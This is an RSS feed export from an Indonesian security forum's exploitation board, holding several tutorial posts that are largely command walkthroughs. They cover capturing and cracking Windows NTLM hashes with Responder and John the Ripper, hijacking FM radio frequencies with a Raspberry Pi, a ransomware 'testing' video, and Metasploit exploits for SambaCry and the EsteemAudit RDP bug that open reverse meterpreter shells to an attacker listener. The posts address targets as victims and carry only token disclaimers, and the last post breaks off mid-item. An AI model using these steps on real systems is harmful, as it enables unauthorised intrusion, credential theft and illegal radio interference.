<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title><![CDATA[BackBox Indonesia - Exploitation]]></title>
		<link>https://www.backboxindonesia.or.id/</link>
		<description><![CDATA[BackBox Indonesia - https://www.backboxindonesia.or.id]]></description>
		<pubDate>Sun, 03 May 2026 13:04:31 +0000</pubDate>
		<generator>MyBB</generator>
		<item>
			<title><![CDATA[Hacking windows 7,8,10 (Responder + john + MS17-010)]]></title>
			<link>https://www.backboxindonesia.or.id/thread-241.html</link>
			<pubDate>Thu, 24 May 2018 06:43:23 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-241.html</guid>
			<description><![CDATA[Hallo guys,<br />
Kali ini saya akan share bagaimana caranya hacking komputer (berbasis windows) di dalam suatu jaringan.<br />
Menurut saya cara ini paling efektif dari sekian cara yang pernah saya pelajari sebelumnya. Karena target di sini adalah hampir semua versi windows yang menjadi target kita.<br />
<br />
Bahan bahan yang harus kita persiapkan.<br />
1. Responder [ <a href="https://github.com/SpiderLabs/Responder" target="_blank" class="mycode_url">https://github.com/SpiderLabs/Responder</a> ]<br />
2. John (John the Ripper) [ <a href="https://github.com/koboi137/john" target="_blank" class="mycode_url">https://github.com/koboi137/john</a> ]<br />
3. Metasploit<br />
<br />
Pertama adalah Responder.<br />
Untuk cara installasinya cukup clone dari github<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; git clone https://github.com/SpiderLabs/Responder</code></div></div><br />
Tools ini fungsinya untuk mengarahkan setiap request di browser yang membuka hostname yang belum terpointer ke ip address atau domain yang di buka belum terdaftar di whois kemudian belum terpointer ke ip address. Sebagai contoh linknya seperti ini "http://localdomain/", yang nantinya setiap link tersebut di arahkan ke ip address kita untuk mendapatkan NTLM (NeTwork LAN Manager) Hash. NTLM Hash ini bisa kita crack untuk mendapatkan password dari system target.<br />
<br />
<br />
Kedua installasi john.<br />
John yang kita butuhkan di sini adalah john versi jumbo, yang kita pakai secara default di system backbox sendiri itu masih versi yang biasa. Makanya saya buatkan git baru untuk installasi john di system backbox yang sekarang. Kalo di system kita sudah terpasang versi jumbo, cara ini bisa kalian skip.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; sudo su<br />
&#36; apt-get install openssl libgmp-dev libgomp1<br />
&#36; cd /opt<br />
&#36; git clone https://github.com/koboi137/john<br />
&#36; cd john/<br />
&#36; mv librexgen.so.2.0.8 /usr/local/lib/<br />
&#36; ln -s /usr/local/lib/librexgen.so.2.0.8 /usr/local/lib/librexgen.so.2.0<br />
&#36; ln -s /usr/local/lib/librexgen.so.2.0.8 /usr/local/lib/librexgen.so<br />
&#36; ldconfig</code></div></div><br />
Cara mengeksekusi john<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; /opt/john/john</code></div></div><br />
<br />
Yang ketiga metasploit.<br />
Secara default metasploit sudah terinstall di system backbox, tapi kalo kalian belum menginstall metasploit bisa baca panduannya di github<br />
=&gt; <a href="https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment" target="_blank" class="mycode_url">https://github.com/rapid7/metasploit-fra...nvironment</a><br />
<br />
<br />
Oke kalo semuanya sudah terinstall kita masuk ke cara exploitasinya.<br />
Pertama kita jalankan Responder<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; cd Responder<br />
&#36; python Responder.py -I wlan0</code></div></div><br />
Options -I adalah interface yang kita gunakan, di sini saya menggunakan interface wlan0 karena saya bermain di jaringan wireless.<br />
Kurang lebih nanti akan seperti ini prosesnya<br />
<br />
<img src="https://image.prntscr.com/image/mpxfeCLlRC2n8pgdmJO3qw.png" alt="[Image: mpxfeCLlRC2n8pgdmJO3qw.png]" class="mycode_img" /><br />
<br />
Di paling bawah ada keterangan NTLM Hash, dan itulah tujuan kita menggunakan responder yaitu mendapatkan NTLM Hash yang nantinya akan kita crack menggunakan john.<br />
<br />
<br />
Setelah kita mendapatkan NTLM Hash langkah selanjutnya kita crack menggunakan john.<br />
Perintahnya kurang lebih seperti ini.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; cd Responder<br />
&#36; cd logs/<br />
&#36; /opt/john/john HTTP-NTLMv2-[IPADDRESS].txt</code></div></div><br />
Atau kalian juga bisa <span style="color: #33cc33;" class="mycode_color">menggunakan wordlist</span>, kalo cara ini tidak mendapatkan hasil.<br />
<br />
Hasilnya akan menjadi seperti ini kalo kalian berhasil meng crack Hash yang kita dapat dari Responder.<br />
<br />
<img src="https://image.prntscr.com/image/8h5VBI1fSxu7FRn0LgTv0g.png" alt="[Image: 8h5VBI1fSxu7FRn0LgTv0g.png]" class="mycode_img" /><br />
<br />
Setelah kita mendapatkan user dan password komputer target, kita langsung menggunakan metasploit untuk masuk ke komputer target.<br />
Langkah selanjutnya akan saya lanjut nanti. Sorry tutorialnya belum beres hehe]]></description>
			<content:encoded><![CDATA[Hallo guys,<br />
Kali ini saya akan share bagaimana caranya hacking komputer (berbasis windows) di dalam suatu jaringan.<br />
Menurut saya cara ini paling efektif dari sekian cara yang pernah saya pelajari sebelumnya. Karena target di sini adalah hampir semua versi windows yang menjadi target kita.<br />
<br />
Bahan bahan yang harus kita persiapkan.<br />
1. Responder [ <a href="https://github.com/SpiderLabs/Responder" target="_blank" class="mycode_url">https://github.com/SpiderLabs/Responder</a> ]<br />
2. John (John the Ripper) [ <a href="https://github.com/koboi137/john" target="_blank" class="mycode_url">https://github.com/koboi137/john</a> ]<br />
3. Metasploit<br />
<br />
Pertama adalah Responder.<br />
Untuk cara installasinya cukup clone dari github<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; git clone https://github.com/SpiderLabs/Responder</code></div></div><br />
Tools ini fungsinya untuk mengarahkan setiap request di browser yang membuka hostname yang belum terpointer ke ip address atau domain yang di buka belum terdaftar di whois kemudian belum terpointer ke ip address. Sebagai contoh linknya seperti ini "http://localdomain/", yang nantinya setiap link tersebut di arahkan ke ip address kita untuk mendapatkan NTLM (NeTwork LAN Manager) Hash. NTLM Hash ini bisa kita crack untuk mendapatkan password dari system target.<br />
<br />
<br />
Kedua installasi john.<br />
John yang kita butuhkan di sini adalah john versi jumbo, yang kita pakai secara default di system backbox sendiri itu masih versi yang biasa. Makanya saya buatkan git baru untuk installasi john di system backbox yang sekarang. Kalo di system kita sudah terpasang versi jumbo, cara ini bisa kalian skip.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; sudo su<br />
&#36; apt-get install openssl libgmp-dev libgomp1<br />
&#36; cd /opt<br />
&#36; git clone https://github.com/koboi137/john<br />
&#36; cd john/<br />
&#36; mv librexgen.so.2.0.8 /usr/local/lib/<br />
&#36; ln -s /usr/local/lib/librexgen.so.2.0.8 /usr/local/lib/librexgen.so.2.0<br />
&#36; ln -s /usr/local/lib/librexgen.so.2.0.8 /usr/local/lib/librexgen.so<br />
&#36; ldconfig</code></div></div><br />
Cara mengeksekusi john<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; /opt/john/john</code></div></div><br />
<br />
Yang ketiga metasploit.<br />
Secara default metasploit sudah terinstall di system backbox, tapi kalo kalian belum menginstall metasploit bisa baca panduannya di github<br />
=&gt; <a href="https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment" target="_blank" class="mycode_url">https://github.com/rapid7/metasploit-fra...nvironment</a><br />
<br />
<br />
Oke kalo semuanya sudah terinstall kita masuk ke cara exploitasinya.<br />
Pertama kita jalankan Responder<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; cd Responder<br />
&#36; python Responder.py -I wlan0</code></div></div><br />
Options -I adalah interface yang kita gunakan, di sini saya menggunakan interface wlan0 karena saya bermain di jaringan wireless.<br />
Kurang lebih nanti akan seperti ini prosesnya<br />
<br />
<img src="https://image.prntscr.com/image/mpxfeCLlRC2n8pgdmJO3qw.png" alt="[Image: mpxfeCLlRC2n8pgdmJO3qw.png]" class="mycode_img" /><br />
<br />
Di paling bawah ada keterangan NTLM Hash, dan itulah tujuan kita menggunakan responder yaitu mendapatkan NTLM Hash yang nantinya akan kita crack menggunakan john.<br />
<br />
<br />
Setelah kita mendapatkan NTLM Hash langkah selanjutnya kita crack menggunakan john.<br />
Perintahnya kurang lebih seperti ini.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; cd Responder<br />
&#36; cd logs/<br />
&#36; /opt/john/john HTTP-NTLMv2-[IPADDRESS].txt</code></div></div><br />
Atau kalian juga bisa <span style="color: #33cc33;" class="mycode_color">menggunakan wordlist</span>, kalo cara ini tidak mendapatkan hasil.<br />
<br />
Hasilnya akan menjadi seperti ini kalo kalian berhasil meng crack Hash yang kita dapat dari Responder.<br />
<br />
<img src="https://image.prntscr.com/image/8h5VBI1fSxu7FRn0LgTv0g.png" alt="[Image: 8h5VBI1fSxu7FRn0LgTv0g.png]" class="mycode_img" /><br />
<br />
Setelah kita mendapatkan user dan password komputer target, kita langsung menggunakan metasploit untuk masuk ke komputer target.<br />
Langkah selanjutnya akan saya lanjut nanti. Sorry tutorialnya belum beres hehe]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Membajak frekuensi radio menggunakan raspberry pi dan kawat]]></title>
			<link>https://www.backboxindonesia.or.id/thread-233.html</link>
			<pubDate>Sun, 10 Dec 2017 07:11:15 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-233.html</guid>
			<description><![CDATA[Okay gus kali ini saya akan coba sedikit sharing ilmu mengenai frekuensi..<br />
Sebelum memasukin isi threads kali ini saya ingin menyampaikan DISCLAIMER terlebih dahulu..<br />
<br />
Karena pembahasan kali ini agak sedikit melanggar aturan yang ada di negeri ini, harapan saya dengan adanya thread kali ini tidak ada orang yang menyakalahgunakan cara yang saya share di sini. Thread ini sifatnya adalah untuk pembelajaran saja, kalo ada orang yang menyalah gunakan cara yang telah di share di thread ini saya tidak bertanggung jawab. Karena di sini saya niatnya untuk membagikan ilmu pengetahuan kepada siapa saja yang ingin bejalar di forum ini.<br />
<br />
Okay tanpa basa basi lagi saya akan coba praktekkan langkah" nya.<br />
Sebelum masuk ke materi kali ini kita harus siapkan terlebih dahulu "Raspberry pi" dan "Kawat" nya. Kalo belum punya, kita bisa beli di toko online seperti tokopedia dll.<br />
<br />
Setelah kita mempersiapkan raspberry nya kita coba install aplikasi untuk mengirim suara ke dalam frekuensi namanya yaitu <a href="https://github.com/markondej/fm_transmitter" target="_blank" class="mycode_url">fm_transmiter</a><br />
Untuk cara installasinya cukup mudah, kita cukup ketikan perintah ini di terminal raspberry pi kita.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; sudo apt-get install make gcc g++<br />
&#36; git clone https://github.com/markondej/fm_transmitter<br />
&#36; cd fm_transmitter<br />
&#36; sudo make<br />
&#36; sudo cp fm_transmitter /usr/bin/fm_transmitter</code></div></div><br />
Setelah fm_transmitter nya terinstall di raspberry, langkah selanjutnya kita tempelkan kawat besi atau tembaga ke dalam pin "GPIO 4" raspberry pi nya. Kalo kurang jelas bisa di lihat di sini skemanya.<br />
<br />
<img src="https://i.stack.imgur.com/yWGmW.png" alt="[Image: yWGmW.png]" class="mycode_img" /><br />
<br />
Setelah itu kita eksekusi saja tools yang sudah kita install tadi. Sebagai contoh, perintahnya seperti ini<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; sudo fm_transmitter -f 103.800 -r sound.wav</code></div></div><br />
Penjelasan:<br />
-f = Frekuensi yang akan kita injeksi<br />
-r = Nama file yang akan kita transmit ke frekuensi<br />
<br />
Cukup mudah bukan caranya??<br />
Kalo kalian kurang jelas dalam penggunaan nya bisa lihat video di bawah ini.<br />
<br />
<!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/eiA8ItrWGhE" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --><br />
<br />
Okay mungkin seperti itu cara yang bisa kita lakunan untuk membajak frekuensi radio menggunakan raspberry pi.<br />
Mohon maaf kalo ada kata yang kurang jelas.<br />
Akhir kata, wasalam =))]]></description>
			<content:encoded><![CDATA[Okay gus kali ini saya akan coba sedikit sharing ilmu mengenai frekuensi..<br />
Sebelum memasukin isi threads kali ini saya ingin menyampaikan DISCLAIMER terlebih dahulu..<br />
<br />
Karena pembahasan kali ini agak sedikit melanggar aturan yang ada di negeri ini, harapan saya dengan adanya thread kali ini tidak ada orang yang menyakalahgunakan cara yang saya share di sini. Thread ini sifatnya adalah untuk pembelajaran saja, kalo ada orang yang menyalah gunakan cara yang telah di share di thread ini saya tidak bertanggung jawab. Karena di sini saya niatnya untuk membagikan ilmu pengetahuan kepada siapa saja yang ingin bejalar di forum ini.<br />
<br />
Okay tanpa basa basi lagi saya akan coba praktekkan langkah" nya.<br />
Sebelum masuk ke materi kali ini kita harus siapkan terlebih dahulu "Raspberry pi" dan "Kawat" nya. Kalo belum punya, kita bisa beli di toko online seperti tokopedia dll.<br />
<br />
Setelah kita mempersiapkan raspberry nya kita coba install aplikasi untuk mengirim suara ke dalam frekuensi namanya yaitu <a href="https://github.com/markondej/fm_transmitter" target="_blank" class="mycode_url">fm_transmiter</a><br />
Untuk cara installasinya cukup mudah, kita cukup ketikan perintah ini di terminal raspberry pi kita.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; sudo apt-get install make gcc g++<br />
&#36; git clone https://github.com/markondej/fm_transmitter<br />
&#36; cd fm_transmitter<br />
&#36; sudo make<br />
&#36; sudo cp fm_transmitter /usr/bin/fm_transmitter</code></div></div><br />
Setelah fm_transmitter nya terinstall di raspberry, langkah selanjutnya kita tempelkan kawat besi atau tembaga ke dalam pin "GPIO 4" raspberry pi nya. Kalo kurang jelas bisa di lihat di sini skemanya.<br />
<br />
<img src="https://i.stack.imgur.com/yWGmW.png" alt="[Image: yWGmW.png]" class="mycode_img" /><br />
<br />
Setelah itu kita eksekusi saja tools yang sudah kita install tadi. Sebagai contoh, perintahnya seperti ini<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; sudo fm_transmitter -f 103.800 -r sound.wav</code></div></div><br />
Penjelasan:<br />
-f = Frekuensi yang akan kita injeksi<br />
-r = Nama file yang akan kita transmit ke frekuensi<br />
<br />
Cukup mudah bukan caranya??<br />
Kalo kalian kurang jelas dalam penggunaan nya bisa lihat video di bawah ini.<br />
<br />
<!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/eiA8ItrWGhE" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --><br />
<br />
Okay mungkin seperti itu cara yang bisa kita lakunan untuk membajak frekuensi radio menggunakan raspberry pi.<br />
Mohon maaf kalo ada kata yang kurang jelas.<br />
Akhir kata, wasalam =))]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Tutorial Testing WannaCry and Petrwrap Petya 2017]]></title>
			<link>https://www.backboxindonesia.or.id/thread-226.html</link>
			<pubDate>Mon, 03 Jul 2017 12:32:46 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-226.html</guid>
			<description><![CDATA[<div style="text-align: center;" class="mycode_align">Ini hanya Tutorial Testing Ransomware yang sekarang lagi booming di Tahun 2017.<br />
Yaitu Ransomware WannaCry dan Petrwrap/Petya.<br />
Gunakan Dengan Resiko Anda Sendiri.<br />
Untuk tujuan pembelajaran saja.<br />
Untuk tujuan pendidikan saja<br />
NOTE : JANGAN DIJAILIN KE ORANG, TEMAN, KE WARNET, ATAU PACAR. <br />
KALO GABISA DECRYPT NYA !!! :V :gerah:lol <br />
<br />
<!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/z4d2Po6sbVE" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --></div>]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;" class="mycode_align">Ini hanya Tutorial Testing Ransomware yang sekarang lagi booming di Tahun 2017.<br />
Yaitu Ransomware WannaCry dan Petrwrap/Petya.<br />
Gunakan Dengan Resiko Anda Sendiri.<br />
Untuk tujuan pembelajaran saja.<br />
Untuk tujuan pendidikan saja<br />
NOTE : JANGAN DIJAILIN KE ORANG, TEMAN, KE WARNET, ATAU PACAR. <br />
KALO GABISA DECRYPT NYA !!! :V :gerah:lol <br />
<br />
<!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/z4d2Po6sbVE" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --></div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Samba Exploit (CVE-2017-7494) SambaCry?]]></title>
			<link>https://www.backboxindonesia.or.id/thread-224.html</link>
			<pubDate>Wed, 14 Jun 2017 04:12:15 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-224.html</guid>
			<description><![CDATA[Setelah beberapa waktu lalu sempet tenar WannaCry dengan memakai SMB Exploit (EternalBlue &amp; DoublePulsar) di Windows, sesaat kemudian juga ditemukan vulnerability di OS keluarga Linux yang menjalankan SAMBA sebagai file-sharing daemon nya. Samba Exploit ini dapat menyerang service Samba versi 3.5.0 sampai 4.4.14, 4.5.10, and 4.6.4. Lebih tepatnya exploit ini memanfaatkan bug writeable file pada versi Samba tersebut untuk melakukan RCE (Remote Code Execution) di komputer korban.<br />
<br />
<br />
<br />
<br />
<br />
1. Dapatkan module <span style="font-weight: bold;" class="mycode_b">Metasploit</span> dari <span style="font-weight: bold;" class="mycode_b">Samba Exploit (is_known_pipename.rb)</span><br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root@attackermachine~:# wget https://github.com/rapid7/metasploit-framework/blob/0520d7cf76f8e5e654cb60f157772200c1b9e230/modules/exploits/linux/samba/is_known_pipename.rb -O /opt/metasploit-frameworks/modules/exploits/linux/samba/sambacry.rb</code></div></div><br />
<span style="font-style: italic;" class="mycode_i">Keterangan :</span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-weight: bold;" class="mycode_b">wget </span>akan mengunduh file <span style="font-weight: bold;" class="mycode_b">is_known_pipe_name.rb</span> dan akan menaruhnya di direktori <span style="font-weight: bold;" class="mycode_b">Metasploit Framework</span> dengan nama <span style="font-weight: bold;" class="mycode_b">sambacry.rb</span></span><br />
<span style="font-style: italic;" class="mycode_i">Dalam hal ini bisa saja letak direktori <span style="font-weight: bold;" class="mycode_b">Metasploit Framework</span> kalian bukan di <span style="font-weight: bold;" class="mycode_b">/opt/</span></span><br />
<br />
<br />
2. Jalankan <span style="font-weight: bold;" class="mycode_b">msfconsole</span> dan mulai exploitasi<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root@attackermachine~:# msfconsole<br />
msf &gt; use exploit/linux/samba/sambacry<br />
msf exploit(sambacry) &gt; set PAYLOAD linux/x64/meterpreter/reverse_tcp<br />
msf exploit(sambacry) &gt; set RHOST IP_KORBAN<br />
msf exploit(sambacry) &gt; set LHOST IP_LISTENER_ATTACKER<br />
msf exploit(sambacry) &gt; set TARGET 3<br />
msf exploit(sambacry) &gt; exploit</code></div></div><br />
<span style="font-style: italic;" class="mycode_i">Keterangan :</span><br />
<span style="font-style: italic;" class="mycode_i">Jika architecture OS korban adalah <span style="font-weight: bold;" class="mycode_b">32bit</span> maka : <span style="font-weight: bold;" class="mycode_b">set PAYLOAD linux/meterpreter/reverse_tcp</span></span><br />
<span style="font-style: italic;" class="mycode_i">Untuk <span style="font-weight: bold;" class="mycode_b">set TARGET</span> saya memilih opsi <span style="font-weight: bold;" class="mycode_b">3</span>, jalankan perintah <span style="font-weight: bold;" class="mycode_b">show targets</span> untuk melihat list architecture target yang tersedia.</span><br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="http://1.bp.blogspot.com/-Z1iShb2FSEo/WTgkya_F5KI/AAAAAAAABIU/l6mQDzfnrcgstblplMci7Fdo8xlkBuRggCK4B/s1600/Screenshot_55.png" alt="[Image: Screenshot_55.png]" class="mycode_img" /></div>
<br />
<br />
<br />
3. Jika exploitasi berhasil, maka akan muncul tampilan seperti berikut<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="http://4.bp.blogspot.com/-Mi5l7gALQi8/WTgk3rD7_VI/AAAAAAAABIc/NDoRAr9J7ocLYTXUv_zkZ6JS7Xte92TPQCK4B/s1600/Screenshot_56.png" width="600" height="400" alt="[Image: Screenshot_56.png]" class="mycode_img" /></div>
<br />
<br />
<br />
<br />
Bonus video :<br />
<br />
<div style="text-align: center;" class="mycode_align"><!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/G_AbzPDrexM" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --></div>
<br />
<br />
<br />
<br />
Oke sekian post nya, semoga bermanfaat. Terimakasih.]]></description>
			<content:encoded><![CDATA[Setelah beberapa waktu lalu sempet tenar WannaCry dengan memakai SMB Exploit (EternalBlue &amp; DoublePulsar) di Windows, sesaat kemudian juga ditemukan vulnerability di OS keluarga Linux yang menjalankan SAMBA sebagai file-sharing daemon nya. Samba Exploit ini dapat menyerang service Samba versi 3.5.0 sampai 4.4.14, 4.5.10, and 4.6.4. Lebih tepatnya exploit ini memanfaatkan bug writeable file pada versi Samba tersebut untuk melakukan RCE (Remote Code Execution) di komputer korban.<br />
<br />
<br />
<br />
<br />
<br />
1. Dapatkan module <span style="font-weight: bold;" class="mycode_b">Metasploit</span> dari <span style="font-weight: bold;" class="mycode_b">Samba Exploit (is_known_pipename.rb)</span><br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root@attackermachine~:# wget https://github.com/rapid7/metasploit-framework/blob/0520d7cf76f8e5e654cb60f157772200c1b9e230/modules/exploits/linux/samba/is_known_pipename.rb -O /opt/metasploit-frameworks/modules/exploits/linux/samba/sambacry.rb</code></div></div><br />
<span style="font-style: italic;" class="mycode_i">Keterangan :</span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-weight: bold;" class="mycode_b">wget </span>akan mengunduh file <span style="font-weight: bold;" class="mycode_b">is_known_pipe_name.rb</span> dan akan menaruhnya di direktori <span style="font-weight: bold;" class="mycode_b">Metasploit Framework</span> dengan nama <span style="font-weight: bold;" class="mycode_b">sambacry.rb</span></span><br />
<span style="font-style: italic;" class="mycode_i">Dalam hal ini bisa saja letak direktori <span style="font-weight: bold;" class="mycode_b">Metasploit Framework</span> kalian bukan di <span style="font-weight: bold;" class="mycode_b">/opt/</span></span><br />
<br />
<br />
2. Jalankan <span style="font-weight: bold;" class="mycode_b">msfconsole</span> dan mulai exploitasi<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root@attackermachine~:# msfconsole<br />
msf &gt; use exploit/linux/samba/sambacry<br />
msf exploit(sambacry) &gt; set PAYLOAD linux/x64/meterpreter/reverse_tcp<br />
msf exploit(sambacry) &gt; set RHOST IP_KORBAN<br />
msf exploit(sambacry) &gt; set LHOST IP_LISTENER_ATTACKER<br />
msf exploit(sambacry) &gt; set TARGET 3<br />
msf exploit(sambacry) &gt; exploit</code></div></div><br />
<span style="font-style: italic;" class="mycode_i">Keterangan :</span><br />
<span style="font-style: italic;" class="mycode_i">Jika architecture OS korban adalah <span style="font-weight: bold;" class="mycode_b">32bit</span> maka : <span style="font-weight: bold;" class="mycode_b">set PAYLOAD linux/meterpreter/reverse_tcp</span></span><br />
<span style="font-style: italic;" class="mycode_i">Untuk <span style="font-weight: bold;" class="mycode_b">set TARGET</span> saya memilih opsi <span style="font-weight: bold;" class="mycode_b">3</span>, jalankan perintah <span style="font-weight: bold;" class="mycode_b">show targets</span> untuk melihat list architecture target yang tersedia.</span><br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="http://1.bp.blogspot.com/-Z1iShb2FSEo/WTgkya_F5KI/AAAAAAAABIU/l6mQDzfnrcgstblplMci7Fdo8xlkBuRggCK4B/s1600/Screenshot_55.png" alt="[Image: Screenshot_55.png]" class="mycode_img" /></div>
<br />
<br />
<br />
3. Jika exploitasi berhasil, maka akan muncul tampilan seperti berikut<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="http://4.bp.blogspot.com/-Mi5l7gALQi8/WTgk3rD7_VI/AAAAAAAABIc/NDoRAr9J7ocLYTXUv_zkZ6JS7Xte92TPQCK4B/s1600/Screenshot_56.png" width="600" height="400" alt="[Image: Screenshot_56.png]" class="mycode_img" /></div>
<br />
<br />
<br />
<br />
Bonus video :<br />
<br />
<div style="text-align: center;" class="mycode_align"><!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/G_AbzPDrexM" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --></div>
<br />
<br />
<br />
<br />
Oke sekian post nya, semoga bermanfaat. Terimakasih.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[RDP Exploit dengan EsteemAudit]]></title>
			<link>https://www.backboxindonesia.or.id/thread-223.html</link>
			<pubDate>Sun, 11 Jun 2017 12:03:53 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-223.html</guid>
			<description><![CDATA[Setelah ramai dengan Eternal Exploit pada WannaCry Ransomware, masih ada salah satu Exploit dari NSA yang belum di-patch! EsteemAudit atau disebut dengan CVE-2017-9073 adalah sebuah Exploit Remote Desktop Connection (RDP) pada sistem operasi Windows Server 2003 dan Windows XP.<br />
<br />
<img src="http://4.bp.blogspot.com/-xSJ8SJO1SUg/WTscSmpwYSI/AAAAAAAABI0/6lpOVAel128GiFgovr0iisD9oKU6yUVdACK4B/s1600/Untitled-1.png" alt="[Image: Untitled-1.png]" class="mycode_img" /><br />
<br />
Dalam post ini saya akan memakai EsteemAudit dari FuzzyBunch yang sudah di porting menjadi module Metasploit<br />
<br />
<br />
1. Download &amp; ekstrak file yang dibutuhkan<br />
Source : <a href="https://github.com/BlackMathIT/Esteemaudit-Metasploit" target="_blank" class="mycode_url">Esteemaudit-Metasploit</a><br />
<br />
Atau clone langsung seperti berikut<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root@attackermachine:~/tool# git clone https://github.com/BlackMathIT/Esteemaudit-Metasploit.git<br />
root@attackermachine:~/tool# cd Esteemaudit-Metasploit/<br />
root@attackermachine:~/tool/Esteemaudit-Metasploit# ls -l</code></div></div><br />
<br />
<br />
2. Didalam nya akan ada 2 file dan 1 folder. Pindahkan semua file yang dibutuhkan ke direktori yang diperlukan.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root@attackermachine:~/tool/Esteemaudit-Metasploit# mkdir /opt/metasploit-framework/modules/exploits/windows/rdp<br />
root@attackermachine:~/tool/Esteemaudit-Metasploit# cp esteemaudit.rb /opt/metasploit-framework/modules/exploits/windows/rdp/<br />
root@attackermachine:~/tool/Esteemaudit-Metasploit# cd files/<br />
root@attackermachine:~/tool/Esteemaudit-Metasploit/files# mkdir /usr/share/esteemaudit<br />
root@attackermachine:~/tool/Esteemaudit-Metasploit/files# cp * /usr/share/esteemaudit/</code></div></div><br />
<br />
<br />
3. Buka <span style="font-weight: bold;" class="mycode_b">msfconsole</span> dan mulai exploitasi dengan EsteemAudit<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>msf &gt; use exploit/windows/rdp/esteemaudit<br />
msf exploit(esteemaudit) &gt; set PAYLOAD windows/meterpreter/reverse_tcp<br />
msf exploit(esteemaudit) &gt; set LHOST IP_LISTENER_ATTACKER<br />
msf exploit(esteemaudit) &gt; set LPORT PORT_LISTERNER_ATTACKER<br />
msf exploit(esteemaudit) &gt; set TARGETARCHITECTURE x86</code></div></div><br />
<span style="font-style: italic;" class="mycode_i">Jika target/korban adalah 64bit maka</span> :<br />
<span style="font-weight: bold;" class="mycode_b">set PAYLOAD</span> <span style="font-weight: bold;" class="mycode_b">windows/x64/meterpreter/reverse_tcp</span><br />
<span style="font-weight: bold;" class="mycode_b">set TARGETARCHITECTURE x86 64-bit</span> <br />
<br />
Lihat target apa saja yang bisa di exploit dengan modul ini dengan perintah berikut<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>msf exploit(esteemaudit) &gt; show targets</code></div></div><br />
<div style="text-align: center;" class="mycode_align"><img src="https://image.prntscr.com/image/Lp-lKatrRRWov39DR-Ykww.png" width="550" height="330" alt="[Image: Lp-lKatrRRWov39DR-Ykww.png]" class="mycode_img" /></div>
<br />
Set target sesuai urutan nomor list yang ada dan jalankan exploit. Misalnya jika targetnya adalah Windows XP SP2 maka seperti berikut.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>msf exploit(esteemaudit) &gt; set TARGET 4<br />
msf exploit(esteemaudit) &gt; exploit</code></div></div><br />
Jika sukses akan terbuka sesi meterpreter seperti berikut.<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://image.prntscr.com/image/aIkCQ0tqRV2IE2LSpSZMog.png" width="550" height="350" alt="[Image: aIkCQ0tqRV2IE2LSpSZMog.png]" class="mycode_img" /></div>
<br />
<br />
<br />
<br />
Bonus Video :<br />
